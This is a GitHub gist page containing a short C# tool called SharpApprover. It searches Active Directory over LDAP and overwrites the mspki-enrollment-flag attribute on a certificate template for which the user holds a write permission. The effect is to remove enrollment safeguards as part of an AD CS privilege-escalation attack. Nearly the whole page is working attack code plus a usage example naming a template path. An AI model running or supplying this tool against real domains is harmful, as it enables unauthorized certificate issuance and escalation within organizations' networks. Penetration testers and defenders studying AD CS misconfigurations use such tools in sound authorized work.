Skip to content

Instantly share code, notes, and snippets.

@Reboare
Forked from dmchell/SharpApprover.cs
Created October 26, 2021 13:23
Show Gist options
  • Save Reboare/650c12548dfefa113775c81588c92b50 to your computer and use it in GitHub Desktop.
Save Reboare/650c12548dfefa113775c81588c92b50 to your computer and use it in GitHub Desktop.
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
using System;
using System.DirectoryServices;
namespace SharpApprover
{
class Program
{
public static void SetAdInfo(string objectFilter,
int objectValue, string LdapDomain)
{
string connectionPrefix = "LDAP://" + LdapDomain;
DirectoryEntry entry = new DirectoryEntry(connectionPrefix);
DirectorySearcher mySearcher = new DirectorySearcher(entry);
mySearcher.Filter = objectFilter;
mySearcher.PropertiesToLoad.Add("mspki-enrollment-flag");
SearchResult result = mySearcher.FindOne();
Console.WriteLine("[*] Searching for object");
if (result != null)
{
Console.WriteLine("[*] Found object");
DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
if (result.Properties.Contains("mspki-enrollment-flag"))
{
Console.WriteLine("[*] Found mspki-enrollment-flag");
entryToUpdate.Properties["mspki-enrollment-flag"].Value = objectValue;
Console.WriteLine("[*] Setting value to " + objectValue);
}
entryToUpdate.CommitChanges();
}
else
{
Console.WriteLine("[!] Object not found");
}
entry.Close();
entry.Dispose();
mySearcher.Dispose();
}
static void Main(string[] args)
{
if (args.Length < 2)
{
Console.WriteLine("[!] SharpApprover - @domchell");
Console.WriteLine("[!] SharpApprover.exe <Template CN> <Value>");
Console.WriteLine("[!] Example:\n\nSharpApprover.exe \"CN=ClientAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=foo,DC=bar\" 0\n");
return;
}
string LdapDomain = args[0];
int objectValue = Int32.Parse(args[1]);
string objectFilter = "(objectClass=*)";
try
{
SetAdInfo(objectFilter, objectValue, LdapDomain);
}
catch(Exception e)
{
Console.WriteLine("[!] Error occured:");
Console.WriteLine(e.Message);
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment